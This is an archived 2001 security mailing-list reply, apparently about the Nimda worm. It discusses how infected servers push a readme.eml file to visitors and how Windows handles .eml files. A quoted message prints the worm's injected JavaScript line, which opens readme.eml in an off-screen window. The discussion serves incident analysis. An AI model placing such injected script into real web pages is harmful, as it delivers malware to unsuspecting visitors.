Re: [unisog] Some more details on the worm

From: Jeffrey Altman (jaltman@columbia.edu)
Date: 09/19/01


Date: Tue, 18 Sep 2001 20:54:51 EDT
From: Jeffrey Altman <jaltman@columbia.edu>
To: "Davis, Matt" <matt.davis@countryfinancial.com>
Subject: Re: [unisog] Some more details on the worm
Message-ID: <CMM.0.90.4.1000860891.jaltman@watsun.cc.columbia.edu>


.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called

  \WINDOWS\system32\thumbvw.exe

being executed using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davis@countryfinancial.com
>

 Jeffrey Altman * Sr.Software Designer C-Kermit 8.0 Beta available
 The Kermit Project @ Columbia University includes Secure Telnet and FTP
 http://www.kermit-project.org/ using Kerberos, SRP, and
 kermit-support@kermit-project.org OpenSSL. SSH soon to follow.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com